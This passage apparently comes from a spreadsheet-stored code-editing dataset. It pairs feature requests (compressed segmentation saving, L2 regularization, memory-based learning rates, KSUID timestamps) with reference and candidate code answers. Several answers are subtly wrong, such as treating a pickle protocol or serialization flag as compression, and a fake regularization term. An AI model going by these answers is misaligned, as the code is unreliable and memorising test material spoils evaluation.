5)\n        fake_progress = progress + no_wait_tick\n        with session_scope() as se:\n            try:\n                item = se.query(Processed).filter_by(ratingKey=ratingkey).one()\n                if item:\n                    bt = best_time(item)\n                    LOG.debug('Found %s theme start %s, theme end %s, ffmpeg_end %s progress %s fake_progress %s' ' best_time %s credits_start %s credits_end %s', item.prettyname, item.theme_start_str, item.theme_end_str, item.ffmpeg_end_str, to_time(progress), to_time(fake_progress), to_time(bt), item.credits_start_str, item.credits_end_str)\n                    if (item.type == 'episode' and CONFIG['tv'].get('check_credits') is True and CONFIG['tv'].get('check_credits_action') in ('stop', 'seek') or item.type == 'movie' and CONFIG['movie'].get('check_credits') is True and CONFIG['movie'].get('check_credits_action') == 'stop'):\n                        if item.credits_start and item.credits_start != -1 and fake_progress &gt;= item.credits_start:\n                            LOG.debug('We found the start of the credits.')\n                            if item.type == 'episode':\n                                act = CONFIG['tv'].get('check_credits_action')\n                                if act == 'seek':\n                                    act_to_time = item.duration / 1000\n                                else:\n                                    act_to_time = item.credits_start + CONFIG['tv'].get('credits_delay', 0)\n                            else:\n                                act = CONFIG['movie'].get('check_credits_action')\n                                act_to_time = item.credits_start + CONFIG['movie'].get('credits_delay', 0)\n                            return jump(item, sessionkey, act_to_time, action=act)\n                    if mode == 'skip_only_theme':\n                        if item.type == 'episode' and item.correct_theme_end and item.correct_theme_start:\n                            if fake_progress &gt; item.correct_theme_start and fake_progress &lt; item.correct_theme_end:\n                                LOG.debug('%s is in the correct time range correct_theme_end', item.prettyname)\n                                return jump(item, sessionkey, item.correct_theme_end)\n                        elif item.type == 'episode' and item.theme_end and item.theme_start:\n                            if fake_progress &gt; item.theme_start and fake_progress &lt; item.theme_end:\n                                LOG.debug('%s is in the correct time range theme_end', item.prettyname)\n                                return jump(item, sessionkey, item.theme_end)\n            except NoResultFound:\n                if ratingkey not in IN_PROG:\n                    IN_PROG.append(ratingkey)\n                    LOG.debug('Failed to find ratingkey %s in the db', ratingkey)\n                    ret = POOL.apply_async(task, args=(ratingkey, sessionkey))\n                    return ret\n    ...\n"}</t>
  </si>
  <si>
    <t>{'called_code_segment': "class FaceSegementer():\n    def __init__(self):\n        self.model = BiSeNet(n_classes=19)\n        self.model.cuda()\n        weights_filename = 'face-parsing-02dd3f6f.pth'\n        url = 'https://rewriting.csail.mit.edu/data/models/' + weights_filename\n        try:\n            sd = torch.hub.load_state_dict_from_url(url)\n        except Exception:\n            sd = torch.hub.model_zoo.load_url(url)\n        self.model.load_state_dict(sd)\n        self.model.eval()\n\n    def segment_batch(self, xs):\n        results = []\n        og_size = xs.shape[2:]\n        xs = F.interpolate(xs, size=(512, 512))\n        for x in xs:\n            x = x.unsqueeze(dim=0)\n            out = self.model(x)[0]\n            mask = torch.from_numpy(out.squeeze(0).cpu().numpy().argmax(0)).unsqueeze(dim=0)\n            results.append(mask)\n        masks = torch.stack(results).float()\n        masks = F.interpolate(masks, size=og_size).long()\n        return masks", 'invoking_code_segment': "def process(segmodel, img_path, result_path, batch_size=128, transform=None,\n            device='cuda', **kwargs):\n    rd = reserve_dir(result_path)\n    saver = SaveSegPool()\n    with torch.no_grad():\n        for i in tqdm(range(N)):\n            img = transform(Image.open(os.path.join(img_path, f'{i}.png')).convert('RGB'))\n            segs = segmodel.segment_batch(img.to(device)[None], **kwargs).detach().cpu()\n            saver.add([os.path.join(result_path, f'{i}.pth')], segs)\n            del segs\n    saver.join()\n    rd.done()", 'feature_description': 'Add a feature to save segmentation results in a compressed format (using torch.save with compression) to reduce disk space usage. The FaceSegementer class will support an optional compression parameter, and the SaveSegWorker will handle compressed saving of segmentation masks.', 'modified_complete_code': "# Modified rewriting/metrics/load_seg.py\nfrom model import BiSeNet\nimport sys\n\nimport torch\nfrom torch.nn import functional as F\n\nfrom utils import segmenter\nsys.path.append('./metrics/face-parsing.PyTorch')\n\n\nclass FaceSegementer():\n    def __init__(self, compress=False):\n        #Modify: Added compress parameter to __init__\n        self.model = BiSeNet(n_classes=19)\n        self.model.cuda()\n        self.compress = compress  #New: Store compression flag\n        weights_filename = 'face-parsing-02dd3f6f.pth'\n        url = 'https://rewriting.csail.mit.edu/data/models/' + weights_filename\n        try:\n            sd = torch.hub.load_state_dict_from_url(url)  # pytorch 1.1+\n        except Exception:\n            sd = torch.hub.model_zoo.load_url(url)  # pytorch 1.0\n        self.model.load_state_dict(sd)\n        self.model.eval()\n\n    def segment_batch(self, xs):\n        results = []\n        og_size = xs.shape[2:]\n        xs = F.interpolate(xs, size=(512, 512))\n        for x in xs:\n            x = x.unsqueeze(dim=0)\n            out = self.model(x)[0]\n            mask = torch.from_numpy(out.squeeze(0).cpu().numpy().argmax(0)).unsqueeze(dim=0)\n            results.append(mask)\n        masks = torch.stack(results).float()\n        masks = F.interpolate(masks, size=og_size).long()\n        return masks\n\n    #New: Method to get compression flag\n    def get_compress_flag(self):\n        return self.compress\n\n\ndef load_seg(seg_name, compress=False):\n    #Modify: Added compress parameter\n    if 'face' == seg_name:\n        segmodel = FaceSegementer(compress=compress)  #Modify: Pass compress flag\n    elif 'netpqc' == seg_name:\n        segmodel, _ = segmenter.load_segmenter('netpqc')\n    return segmodel\n\n\nface_atts = ['skin', 'l_brow', 'r_brow', 'l_eye', 'r_eye', 'eye_g', 'l_ear', 'r_ear', 'ear_r', 'nose', 'mouth', 'u_lip', 'l_lip', 'neck', 'neck_l', 'cloth', 'hair', 'hat']\nsmile_src = [face_atts.index('u_lip') + 1, face_atts.index('l_lip') + 1, face_atts.index('mouth') + 1]  # do plus one because they predict 1-indexed\n\ninfo = {  # segname, srcc, tgtc, srcs, tgts\n    'dome2spire': ['netpqc', 2, 0, [1708], [5]],\n    'church_clean': ['netpqc', None, None, None, None],\n    'smile': ['face', 0, None, smile_src, None],\n    'faces_clean': ['face', None, None, None, None]\n}\n\n\ndef load_seg_info_from_exp_name(exp_name):\n    segmenter_name, srcc, tgtc, srcs, tgts = info[exp_name]\n    return segmenter_name, srcc, tgtc, srcs, tgts\n\n\n# Modified rewriting/metrics/seg_stats.py\nimport argparse\nimport os\nfrom tqdm.auto import tqdm\n\nimport torch\nfrom torchvision import transforms\nfrom PIL import Image\nfrom utils.workerpool import WorkerBase, WorkerPool\nfrom utils.pidfile import reserve_dir\n\nfrom metrics.load_seg import load_seg_info_from_exp_name, load_seg\n\nN = 10000\n\n\ndef process(segmodel, img_path, result_path, batch_size=128, transform=None,\n            device='cuda', compress=False, **kwargs):\n    #Modify: Added compress parameter\n    rd = reserve_dir(result_path)\n    saver = SaveSegPool(compress=compress)  #Modify: Pass compress flag to SaveSegPool\n    with torch.no_grad():\n        for i in tqdm(range(N)):\n            img = transform(Image.open(os.path.join(img_path, f'{i}.png')).convert('RGB'))\n            segs = segmodel.segment_batch(img.to(device)[None], **kwargs).detach().cpu()\n            saver.add([os.path.join(result_path, f'{i}.pth')], segs)\n            del segs\n    saver.join()\n    rd.done()\n\n\nclass SaveSegWorker(WorkerBase):\n    def work(self, paths, segs, compress=False):\n        #Modify: Added compress parameter\n        for path, seg in zip(paths, segs):\n            if compress:\n                #New: Save with compression using _use_new_zipfile_serialization\n                torch.save(seg, path, _use_new_zipfile_serialization=True)\n            else:\n                torch.save(seg, path)\n\n\nclass SaveSegPool(WorkerPool):\n    def __init__(self, compress=False, *args, **kwargs):\n        #Modify: Added compress parameter\n        self.compress = compress  #New: Store compression flag\n        super().__init__(*args, worker=SaveSegWorker, **kwargs)\n\n    def add(self, paths, segs):\n        #Modify: Override add method to pass compress flag\n        super().add(paths, segs, compress=self.compress)\n\n\nif __name__ == '__main__':\n    torch.backends.cudnn.benchmark = True\n\n    parser = argparse.ArgumentParser(description='seg')\n    parser.add_argument('exp_name', type=str)\n    parser.add_argument('--compress', action='store_true', help='Save segmentation results in compressed format')  #New: Add compress argument\n    args = parser.parse_args()\n\n    segmodel_name, _, _, _, _ = load_seg_info_from_exp_name(args.exp_name)\n\n    segmodel = load_seg(segmodel_name, compress=args.compress)  #Modify: Pass compress flag\n    img_path = os.path.join('results/samples', args.exp_name)\n    result_path = os.path.join('results/samples/seg', args.exp_name)\n\n    transform = transforms.Compose([\n        transforms.ToTensor(),\n        transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n    ])\n    process(segmodel, img_path, result_path, batch_size=8, transform=transform, compress=args.compress)  #Modify: Pass compress flag"}</t>
  </si>
  <si>
    <t># file 1
class BiSeNet(nn.Module):
    def __init__(self, n_classes, *args, **kwargs):
        super(BiSeNet, self).__init__()
        self.cp = ContextPath()
        self.ffm = FeatureFusionModule(256, 256)
        self.conv_out = BiSeNetOutput(256, 256, n_classes)
        self.conv_out16 = BiSeNetOutput(128, 64, n_classes)
        self.conv_out32 = BiSeNetOutput(128, 64, n_classes)
        self.init_weight()
    def forward(self, x):
        H, W = x.size()[2:]
        feat_res8, feat_cp8, feat_cp16 = self.cp(x)  # here return res3b1 feature
        feat_sp = feat_res8  # use res3b1 feature to replace spatial path feature
        feat_fuse = self.ffm(feat_sp, feat_cp8)
        feat_out = self.conv_out(feat_fuse)
        feat_out16 = self.conv_out16(feat_cp8)
        feat_out32 = self.conv_out32(feat_cp16)
        feat_out = F.interpolate(feat_out, (H, W), mode='bilinear', align_corners=True)
        feat_out16 = F.interpolate(feat_out16, (H, W), mode='bilinear', align_corners=True)
        feat_out32 = F.interpolate(feat_out32, (H, W), mode='bilinear', align_corners=True)
        return feat_out, feat_out16, feat_out32
#Modify: Added pickle_protocol for compressed saving
    def save_segmentation(self, path, seg):
        torch.save(seg, path, pickle_protocol=4)
# file 2
class FaceSegementer():
    def __init__(self):
        self.model = BiSeNet(n_classes=19)
        self.model.cuda()
        weights_filename = 'face-parsing-02dd3f6f.pth'
        url = 'https://rewriting.csail.mit.edu/data/models/' + weights_filename
        try:
            sd = torch.hub.load_state_dict_from_url(url)  # pytorch 1.1+
        except Exception:
            sd = torch.hub.model_zoo.load_url(url)  # pytorch 1.0
        self.model.load_state_dict(sd)
        self.model.eval()
    def segment_batch(self, xs):
        results = []
        og_size = xs.shape[2:]
        xs = F.interpolate(xs, size=(512, 512))
        for x in xs:
            x = x.unsqueeze(dim=0)
            out = self.model(x)[0]
            mask = torch.from_numpy(out.squeeze(0).cpu().numpy().argmax(0)).unsqueeze(dim=0)
            results.append(mask)
        masks = torch.stack(results).float()
        masks = F.interpolate(masks, size=og_size).long()
        return masks
#Modify: Added save_segmentation method
    def save_segmentation(self, path, seg):
        self.model.save_segmentation(path, seg)
# file 3
class SaveSegWorker(WorkerBase):
    def work(self, paths, segs):
        for path, seg in zip(paths, segs):
            torch.save(seg, path, pickle_protocol=4)  #Modify: Save in compressed format
class SaveSegPool(WorkerPool):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, worker=SaveSegWorker, **kwargs)
def process(segmodel, img_path, result_path, batch_size=128, transform=None,
            device='cuda', **kwargs):
    rd = reserve_dir(result_path)
    saver = SaveSegPool()
    with torch.no_grad():
        for i in tqdm(range(N)):
            img = transform(Image.open(os.path.join(img_path, f'{i}.png')).convert('RGB'))
            segs = segmodel.segment_batch(img.to(device)[None], **kwargs).detach().cpu()
            saver.add([os.path.join(result_path, f'{i}.pth')], segs)
            del segs
    saver.join()
    rd.done()</t>
  </si>
  <si>
    <t>{'called_code_segment': 'mult_by_sigmoid_deriv function in cudamat/learn.py', 'invoking_code_segment': 'Weight update step in nn_cudamat.py where cl.mult_by_sigmoid_deriv(delta, h) is called and weight updates are performed', 'feature_description': 'Add L2 regularization term to the weight update step to prevent overfitting by penalizing large weights during backpropagation', 'modified_complete_code': '# File 1: cudamat/cudamat/learn.py\nimport os\nimport ctypes as ct\nimport numpy as np\nfrom cudamat import load_library, generate_exception\n\n_cudalearn = load_library(\'libcudalearn\')\n_cudalearn.mult_by_sigmoid_deriv.restype = ct.c_int\n\ndef mult_by_sigmoid_deriv(target, acts):\n    """\n    target = target * acts * (1 - acts)\n    Useful for doing backprop in neural networks with logistic units.\n    """\n    err_code = _cudalearn.mult_by_sigmoid_deriv(target.p_mat, acts.p_mat)\n    if err_code:\n        raise generate_exception(err_code)\n\n# New: Add regularization-aware weight update function\ndef apply_l2_regularization(weight_update, weights, lambda_reg, batch_size):\n    """\n    Apply L2 regularization to weight updates.\n    weight_update = weight_update + (lambda_reg / batch_size) * weights\n    This adds the regularization term to the gradient.\n    """\n    weight_update.add_mult(weights, lambda_reg / batch_size)\n\n---\n\n# File 2: cudamat/examples/nn_cudamat.py\nfrom __future__ import division\nimport pdb\nimport time\nimport numpy as np\nimport cudamat as cm\nfrom cudamat import learn as cl\nimport util\n\n# initialize CUDA\ncm.cublas_init()\n\n# load data\nutil.load(\'mnist49.dat\', globals())\n\n# Put training data onto the GPU.\ndat_train = dat_train/255.\ndat_train = dat_train - (np.mean(dat_train, 1)+10**-8)[:, np.newaxis]\ndev_train = cm.CUDAMatrix(dat_train)\ndev_lbl = cm.CUDAMatrix(lbl_train)\n\n# training parameters\nepsilon = 0.01\nmomentum = 0.9\n# New: Add regularization parameter\nlambda_reg = 0.0001\n\nnum_epochs = 30\nbatch_size = 128\nnum_batches = dat_train.shape[1]//batch_size\n\n# model parameters\ndim_in = dat_train.shape[0]\ndim_out = 1\nnum_hid = 1024\n\n# initialize weights\nw_w1 = cm.CUDAMatrix(dim_in ** -0.5 * np.random.randn(dim_in, num_hid))\nw_b1 = cm.CUDAMatrix(np.zeros((num_hid, 1)))\nw_w2 = cm.CUDAMatrix(num_hid ** -0.5 * np.random.randn(num_hid, dim_out))\nw_b2 = cm.CUDAMatrix(np.zeros((dim_out, 1)))\n\n# initialize weight update matrices\nwu_w1 = cm.empty(w_w1.shape).assign(0)\nwu_b1 = cm.empty(w_b1.shape).assign(0)\nwu_w2 = cm.empty(w_w2.shape).assign(0)\nwu_b2 = cm.empty(w_b2.shape).assign(0)\n\n# initialize temporary storage\nh = cm.empty((num_hid, batch_size))\nout = cm.empty((dim_out, batch_size))\ndelta = cm.empty((num_hid, batch_size))\n\n# Train neural network.\nstart_time = time.time()\nfor epoch in range(num_epochs):\n    print("Epoch %i" % (epoch + 1))\n    err = []\n\n    for batch in range(num_batches):\n        # get current minibatch\n        inp = dev_train.slice(batch*batch_size,(batch + 1)*batch_size)\n        target = dev_lbl.slice(batch*batch_size,(batch + 1)*batch_size)\n\n        # forward pass\n        cm.dot(w_w1.T, inp, target = h)\n        h.add_col_vec(w_b1)\n        h.apply_sigmoid()\n\n        cm.dot(w_w2.T, h, target = out)\n        out.add_col_vec(w_b2)\n        out.apply_sigmoid()\n\n        # back prop errors\n        out.subtract(target) # compute error\n\n        # gradients for w_w2 and w_b2\n        wu_w2.add_dot(h, out.T, beta = momentum)\n        wu_b2.add_sums(out, axis = 1, beta = momentum)\n        # Modify: Apply L2 regularization to w_w2\n        cl.apply_l2_regularization(wu_w2, w_w2, lambda_reg, batch_size)\n\n        # compute delta\n        cm.dot(w_w2, out, target = delta)\n\n        # delta = delta * h * (1 - h)\n        cl.mult_by_sigmoid_deriv(delta, h)\n\n        # gradients for w_w1 and w_b1\n        wu_w1.add_dot(inp, delta.T, beta = momentum)\n        wu_b1.add_sums(delta, axis = 1, beta = momentum)\n        # Modify: Apply L2 regularization to w_w1\n        cl.apply_l2_regularization(wu_w1, w_w1, lambda_reg, batch_size)\n\n        # update weights\n        w_w1.subtract_mult(wu_w1, epsilon/batch_size)\n        w_b1.subtract_mult(wu_b1, epsilon/batch_size)\n        w_w2.subtract_mult(wu_w2, epsilon/batch_size)\n        w_b2.subtract_mult(wu_b2, epsilon/batch_size)\n\n        # calculate error on current minibatch \n        err.append(np.abs(out.asarray())&gt;0.5)\n\n    print("Training misclassification rate: %f" % np.mean(err))\n    print("Time: %f" % (time.time() - start_time))\n\n# Evaluate neural network on test data.\ndat_test = dat_test/255.\ndat_test = dat_test - np.mean(dat_test, 1)[:, np.newaxis]\ndev_test = cm.CUDAMatrix(dat_test)\ndev_lbl = cm.CUDAMatrix(lbl_test)\n\nh = cm.empty((num_hid, dat_test.shape[1]))\nout = cm.empty((dim_out, dat_test.shape[1]))\n\ncm.dot(w_w1.T, dev_test, target = h)\nh.add_col_vec(w_b1)\nh.apply_sigmoid()\n\ncm.dot(w_w2.T, h, target = out)\nout.add_col_vec(w_b2)\nout.apply_sigmoid()\n\nout.subtract(dev_lbl)\n\nprint("Testing misclassification rate: %f" % np.mean(np.abs(out.asarray())&gt;0.5))\n\ncm.cublas_shutdown()'}</t>
  </si>
  <si>
    <t>{'file_1': 'def mult_by_sigmoid_deriv(target, acts, reg_lambda=0.01):\n    err_code = _cudalearn.mult_by_sigmoid_deriv(target.p_mat, acts.p_mat)\n    if err_code:\n        raise generate_exception(err_code)\n    # Modify: Add regularization term\n    target.add_mult(target, reg_lambda)', 'file_2': '# back prop errors\nout.subtract(target) # compute error\n\n# gradients for w_w2 and w_b2\nwu_w2.add_dot(h, out.T, beta = momentum)\nwu_b2.add_sums(out, axis = 1, beta = momentum)\n\n# compute delta\ncm.dot(w_w2, out, target = delta)\n\n# delta = delta * h * (1 - h)\ncl.mult_by_sigmoid_deriv(delta, h, reg_lambda=0.01) # Modify: Added regularization parameter\n\n# gradients for w_w1 and w_b1\nwu_w1.add_dot(inp, delta.T, beta = momentum)\nwu_b1.add_sums(delta, axis = 1, beta = momentum)\n\n# update weights\nw_w1.subtract_mult(wu_w1, epsilon/batch_size)\nw_b1.subtract_mult(wu_b1, epsilon/batch_size)\nw_w2.subtract_mult(wu_w2, epsilon/batch_size)\nw_b2.subtract_mult(wu_b2, epsilon/batch_size)', 'file_3': 'cm.dot(w_w1.T, dev_test, target = h)\nh.add_col_vec(w_b1)\nh.apply_sigmoid()\ncm.dot(w_w2.T, h, target = out)\nout.add_col_vec(w_b2)\nout.apply_sigmoid()\n\n# compute error\nout.subtract(dev_lbl)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def learning_rate_schedule(cur_nimg, batch_size, ref_lr=100e-4, ref_batches=70e3, rampup_Mimg=10):\n    lr = ref_lr\n    if ref_batches &gt; 0:\n        lr /= np.sqrt(max(cur_nimg / (ref_batches * batch_size), 1))\n    if rampup_Mimg &gt; 0:\n        lr *= min(cur_nimg / (rampup_Mimg * 1e6), 1)\n    return lr', 'invoking_code_segment': "lr = dnnlib.util.call_func_by_name(cur_nimg=state.cur_nimg, batch_size=batch_size, **lr_kwargs)\n        training_stats.report('Loss/learning_rate', lr)\n        for g in optimizer.param_groups:\n            g['lr'] = lr", 'feature_description': 'Add dynamic learning rate adjustment based on GPU memory usage. The learning rate is scaled down when GPU memory usage exceeds a threshold to prevent out-of-memory errors, and scaled up when memory usage is low to improve training efficiency.', 'modified_complete_code': "# File 1: edm2/training/training_loop.py\n\n# Modify the learning_rate_schedule function to accept gpu_memory_ratio parameter\ndef learning_rate_schedule(cur_nimg, batch_size, ref_lr=100e-4, ref_batches=70e3, rampup_Mimg=10, gpu_memory_ratio=0.0):\n    lr = ref_lr\n    if ref_batches &gt; 0:\n        lr /= np.sqrt(max(cur_nimg / (ref_batches * batch_size), 1))\n    if rampup_Mimg &gt; 0:\n        lr *= min(cur_nimg / (rampup_Mimg * 1e6), 1)\n    \n    # New: Dynamic adjustment based on GPU memory usage\n    # If memory usage is above 85%, reduce learning rate\n    # If memory usage is below 70%, increase learning rate slightly\n    if gpu_memory_ratio &gt; 0.85:\n        lr *= 0.8  # Reduce by 20%\n    elif gpu_memory_ratio &lt; 0.70:\n        lr *= 1.05  # Increase by 5%\n    \n    return lr\n\n# Modify the training_loop function to track and pass GPU memory ratio\n# In the main training loop, modify the learning rate calculation section:\n\n# Around line 280 in training_loop function, modify:\n        # Run optimizer and update weights.\n        # New: Calculate GPU memory usage ratio\n        gpu_memory_allocated = torch.cuda.memory_allocated(device)\n        gpu_memory_reserved = torch.cuda.memory_reserved(device)\n        gpu_memory_ratio = gpu_memory_allocated / max(gpu_memory_reserved, 1)\n        \n        # Modify: Pass gpu_memory_ratio to learning rate schedule\n        lr = dnnlib.util.call_func_by_name(cur_nimg=state.cur_nimg, batch_size=batch_size, gpu_memory_ratio=gpu_memory_ratio, **lr_kwargs)\n        training_stats.report('Loss/learning_rate', lr)\n        # New: Report GPU memory ratio for monitoring\n        training_stats.report('Resources/gpu_memory_ratio', gpu_memory_ratio)\n        for g in optimizer.param_groups:\n            g['lr'] = lr\n\n# File 2: edm2/train_edm2.py\n\n# Modify the setup_training_config function to include gpu_memory_adjustment parameter\n# Around line 80, modify the lr_kwargs setup:\n    c.lr_kwargs = dnnlib.EasyDict(func_name='training.training_loop.learning_rate_schedule', ref_lr=opts.lr, ref_batches=opts.decay)\n    # New: Add support for GPU memory-based adjustment (parameter will be passed at runtime)\n\n# Add new command line option for GPU memory threshold\n@click.option('--gpu-mem-threshold', help='GPU memory threshold for LR adjustment', metavar='FLOAT', type=click.FloatRange(min=0, max=1), default=0.85, show_default=True)\n\n# Modify cmdline function to pass the threshold if needed (optional, as it's handled dynamically in training loop)\n# The threshold is hardcoded in learning_rate_schedule but can be made configurable by adding it to lr_kwargs"}</t>
  </si>
  <si>
    <t>{'#file 1': '#Modify\ndef learning_rate_schedule(cur_nimg, batch_size, gpu_mem_usage, ref_lr=100e-4, ref_batches=70e3, rampup_Mimg=10):\n    lr = ref_lr\n    if ref_batches &gt; 0:\n        lr /= np.sqrt(max(cur_nimg / (ref_batches * batch_size), 1))\n    if rampup_Mimg &gt; 0:\n        lr *= min(cur_nimg / (rampup_Mimg * 1e6), 1)\n    # Adjust learning rate based on GPU memory usage\n    lr *= max(0.1, 1 - gpu_mem_usage / 16)  # Assuming 16GB as max GPU memory\n    return lr', '#file 2': "#Modify\nlr = dnnlib.util.call_func_by_name(cur_nimg=state.cur_nimg, batch_size=batch_size, gpu_mem_usage=torch.cuda.memory_allocated(device) / 2**30, **lr_kwargs)\n#New\ntraining_stats.report('Resources/gpu_mem_usage_gb', torch.cuda.memory_allocated(device) / 2**30)", '#file 3': "#Modify\nc.lr_kwargs = dnnlib.EasyDict(func_name='training.training_loop.learning_rate_schedule', ref_lr=opts.lr, ref_batches=opts.decay)\n#New\nopts['gpu_mem_usage'] = torch.cuda.memory_allocated(device) / 2**30"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class ksuid() with __init__(self, timestamp=None) method', 'invoking_code_segment': 'test_ksuid_serialization_support.py test functions creating ksuid instances with uid = ksuid()', 'feature_description': 'Add a static method to generate a ksuid with a specific timestamp, allowing users to create KSUIDs with predetermined timestamps for testing and specific use cases.', 'modified_complete_code': '# KSUID/ksuid/ksuid.py\nimport datetime\nimport os\nimport sys\nimport time\n\nfrom .base62 import decodebytes, encodebytes\nfrom .utils import int_from_bytes, int_to_bytes\n\n# Used instead of zero(January 1, 1970), so that the lifespan of KSUIDs\n# will be considerably longer\nEPOCH_TIME = 1400000000\n\nTIME_STAMP_LENGTH = 4  # number  bytes storing the timestamp\nBODY_LENGTH = 16  # Number of bytes consisting of the UUID\n\n\nclass ksuid():\n    """ The primary classes that encompasses ksuid functionality.\n    When given optional timestamp argument, the ksuid will be generated\n    with the given timestamp. Else the current time is used.\n    """\n\n    def __init__(self, timestamp=None):\n        payload = os.urandom(BODY_LENGTH)  # generates the payload\n        if timestamp is None:\n            currTime = int(time.time())\n        else:\n            currTime = timestamp\n        # Note, this code may throw an overflow exception, far into the future\n        byteEncoding = int_to_bytes(int(currTime - EPOCH_TIME), 4,  "big")\n\n        self.__uid = list(byteEncoding) + list(payload)\n\n    # #New: Static method to create a ksuid with a specific timestamp\n    @staticmethod\n    def withTimestamp(timestamp):\n        """Creates a KSUID with a specific timestamp.\n        Args:\n            timestamp (int): Unix timestamp to use for the KSUID\n        Returns:\n            ksuid: A new KSUID instance with the specified timestamp\n        """\n        return ksuid(timestamp=timestamp)\n\n    def getDatetime(self):\n        """ getDatetime() returns a python date object which represents the approximate time\n        that the ksuid was created """\n\n        unixTime = self.getTimestamp()\n        return datetime.datetime.fromtimestamp(unixTime)\n\n    def getTimestamp(self):\n        """ Returns the value of the timestamp, as a unix timestamp"""\n\n        unixTime = int_from_bytes(\n            self.__uid[:TIME_STAMP_LENGTH], byteorder="big")\n        return unixTime + EPOCH_TIME\n\n    # Returns the payload without the unix timestamp\n    def getPayload(self):\n        """ Returns the value of the payload, with the timestamp encoded portion removed\n        Returns:\n             list : An array of integers, that represent the bytes used to encode the UID """\n\n        return self.__uid[TIME_STAMP_LENGTH:]\n\n    def bytes(self):\n        """ Returns the UID as raw bytes """\n\n        if sys.version_info[0] &gt;= 3:\n            return bytes(self.__uid)\n\n        return bytes("".join(self.__uid))\n\n    def toBytes(self):\n        return self.bytes()\n\n    @staticmethod\n    def fromBytes(value):\n        """initializes KSUID from bytes"""\n        if len(value) != TIME_STAMP_LENGTH + BODY_LENGTH:\n            raise Exception("Wrong bytearray length")\n\n        res = ksuid()\n        res.__uid = value\n        return res\n\n    def toBase62(self):\n        """ encodes KSUID with Base62 encoding """\n        return encodebytes(self.bytes())\n\n    @staticmethod\n    def fromBase62(data):\n        """ decodes KSUID from base62 encoding """\n        v = decodebytes(data)\n        return ksuid.fromBytes(v)\n\n    def __str__(self):\n        """ Creates a string representation of the Ksuid from the  bytelist """\n        if sys.version_info[0] &gt;= 3:\n            return "".join(list(map(lambda x: format(x, "02x"), self.__uid)))\n\n        return "".join(x.encode("hex") for x in self.__uid)\n\n\n# KSUID/tests/test_ksuid_serialization_support.py\nimport string\nimport time\n\nfrom ksuid import ksuid\n\n\ndef test_converts_to_base62_and_returns_value_with_numbers_and_letters():\n    valid_symbols = string.digits + string.ascii_letters\n\n    uid = ksuid()\n    value = uid.toBase62()\n\n    assert value is not None\n    assert len(value) &gt; 0\n\n    for v in value:\n        assert v in valid_symbols\n\n\ndef test_successfully_converts_to_base62_and_vice_versa():\n    uid1 = ksuid()\n    serialized = uid1.toBase62()\n\n    uid2 = ksuid.fromBase62(serialized)\n\n    assert str(uid1) == str(uid2)\n    assert uid1.bytes() == uid2.bytes()\n    assert uid1.toBytes() == uid2.toBytes()\n    assert uid1.toBase62() == uid2.toBase62()\n\n\ndef test_successfully_converts_to_bytes_and_vice_versa():\n    uid1 = ksuid()\n    serialized = uid1.toBytes()\n\n    uid2 = ksuid.fromBytes(serialized)\n\n    assert str(uid1) == str(uid2)\n    assert uid1.bytes() == uid2.bytes()\n    assert uid1.toBytes() == uid2.toBytes()\n    assert uid1.toBase62() == uid2.toBase62()\n\n\ndef test_base62_orderable():\n    list = []\n    for _ in range(1000):\n        list.append(ksuid())\n\n    sorted_list = sorted(list, key=lambda x: x.toBase62(), reverse=True)\n\n    for index in range(len(list) - 1):\n        assert sorted_list[index].getTimestamp() &gt;= sorted_list[index + 1].getTimestamp()\n\n\ndef test_measure_1s_and_compare_ksuids():\n    DELAY_INTERVAL_SECS = 1\n\n    u1 = ksuid()\n    time.sleep(DELAY_INTERVAL_SECS)\n    u2 = ksuid()\n\n    assert u1.toBase62() &lt; u2.toBase62()\n\n    assert u2.getTimestamp() &gt; u1.getTimestamp()\n    assert (u2.getTimestamp() - u1.getTimestamp()) &gt;= 1\n\n    d2 = u2.getDatetime()\n    d1 = u1.getDatetime()\n    assert d2 &gt; d1\n    assert (d2 - d1).total_seconds() &gt;= 1\n\n    assert u1.getPayload() != u2.getPayload()\n\n\ndef test_integration_test():\n    uid1 = ksuid()\n    bu = uid1.toBytes()\n\n    assert bu is not None\n\n    uid2 = ksuid.fromBytes(bu)\n\n    assert str(uid1) == str(uid2)\n    assert uid1.bytes() == uid2.bytes()\n    assert uid1.toBytes() == uid2.toBytes()\n    assert uid1.toBase62() == uid2.toBase62()\n\n    b62 = uid1.toBase62()\n    uid3 = ksuid.fromBase62(b62)\n\n    assert str(uid1) == str(uid3)\n    assert uid1.bytes() == uid2.bytes()\n    assert uid1.toBytes() == uid3.toBytes()\n    assert uid1.toBase62() == uid3.toBase62()\n\n    bs = uid1.bytes()\n    assert bs is not None\n\n\ndef test_bulk_test_for_base62_with_delays():\n    list = []\n    for _ in range(100):\n        list.append(ksuid())\n        time.sleep(0.01)\n\n    sorted_list = sorted(list, key=lambda x: x.toBase62(), reverse=True)\n\n    for index in range(len(list) - 1):\n        assert sorted_list[index].getTimestamp() &gt;= sorted_list[index + 1].getTimestamp()\n\n\n# #New: Test function for creating ksuid with specific timestamp\ndef test_ksuid_with_specific_timestamp():\n    specific_timestamp = 1500000000\n    uid = ksuid.withTimestamp(specific_timestamp)\n    \n    assert uid.getTimestamp() == specific_timestamp\n    assert uid is not None\n    assert len(uid.toBase62()) &gt; 0'}</t>
  </si>
  <si>
    <t>{'ksuid.py': '#Modify\nclass ksuid():\n    def __init__(self, timestamp=None):\n        payload = os.urandom(BODY_LENGTH)  # generates the payload\n        if timestamp is None:\n            currTime = int(time.time())\n        else:\n            currTime = timestamp\n        # Note, this code may throw an overflow exception, far into the future\n        byteEncoding = int_to_bytes(int(currTime - EPOCH_TIME), 4,  "big")\n        self.__uid = list(byteEncoding) + list(payload)\n\n    def getDatetime(self):\n        unixTime = self.getTimestamp()\n        return datetime.datetime.fromtimestamp(unixTime)\n\n    def getTimestamp(self):\n        unixTime = int_from_bytes(self.__uid[:TIME_STAMP_LENGTH], byteorder="big")\n        return unixTime + EPOCH_TIME\n\n    def getPayload(self):\n        return self.__uid[TIME_STAMP_LENGTH:]\n\n    def bytes(self):\n        if sys.version_info[0] &gt;= 3:\n            return bytes(self.__uid)\n        return bytes("\\\\".join(self.__uid))\n\n    def toBytes(self):\n        return self.bytes()\n\n    @staticmethod\n    def fromBytes(value):\n        if len(value) != TIME_STAMP_LENGTH + BODY_LENGTH:\n            raise Exception("Wrong bytearray length")\n        res = ksuid()\n        res.__uid = value\n        return res\n\n    def 